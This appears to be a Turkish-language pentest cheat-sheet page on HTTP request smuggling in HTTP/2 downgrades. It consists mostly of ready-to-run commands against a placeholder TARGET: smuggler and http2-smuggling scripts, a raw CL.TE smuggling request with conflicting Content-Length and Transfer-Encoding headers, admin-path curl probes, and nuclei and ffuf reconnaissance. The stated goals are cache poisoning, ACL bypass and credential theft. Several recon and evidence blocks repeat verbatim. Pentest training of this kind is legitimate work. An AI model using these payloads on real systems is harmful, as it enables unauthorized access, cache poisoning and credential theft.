Skip to content

Request Smuggling in HTTP/2 Downgrades

web smuggling

Request Smuggling in HTTP/2 Downgrades front-end ile back-end’in HTTP mesaj sınırlarını farklı yorumlamasından doğar. Desync ile istek kaçırma, cache poison ve ACL bypass denenir.

  1. Front-end/back-end parser farkını CL.TE/TE.CL ile test et.

  2. Smuggler/nuclei ile desync sinyali yakala.

  3. Poisoned request ile ACL/cache etkisini göster.

  4. Tekrar üretilebilir PoC kaydet.

Terminal window
python3 smuggler.py -u https://TARGET
Terminal window
nuclei -u https://TARGET -tags smuggling -silent
POST / HTTP/1.1
Host: TARGET
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked
0
G
Terminal window
python3 http2-smuggling.py https://TARGET
H2 request → H1 backend: CL/TE uyumsuzluğu
Terminal window
curl --http2 -sk https://TARGET/ -D -
admin paneli request smuggle, cache poison, bypass ACL, credential theft
Terminal window
curl -sk https://TARGET/admin -H 'Host: TARGET' -H 'X-Ignore: x'

Request Smuggling in HTTP/2 Downgrades sonuçları hedef sürüme ve yığına göre değişir. Her başarılı adımı request/response ile kaydet; sonraki pivot’u not et.

Terminal window
curl -sk https://TARGET/robots.txt
Terminal window
nuclei -u https://TARGET -as -silent
Terminal window
ffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,403
GET / HTTP/1.1
Host: TARGET
Accept: */*
Terminal window
mkdir -p evidence/web && tee evidence/web/notes.txt

Bu ekler keşif ve kanıt paketini hızlandırır; asıl sömürü üstteki bölümlerdeki konu-özel payload’larla yapılır.

Terminal window
curl -sk https://TARGET/robots.txt
Terminal window
curl -sk https://TARGET/sitemap.xml
Terminal window
ffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,403
Terminal window
nuclei -u https://TARGET -as -silent
GET / HTTP/1.1
Host: TARGET
Accept: */*
Terminal window
mkdir -p evidence/web && tee evidence/web/notes.txt
request/response
zaman damgası
kullanılan hesap
etki özeti
Terminal window
curl -sk https://TARGET/ -D evidence/web/headers.txt -o evidence/web/body.html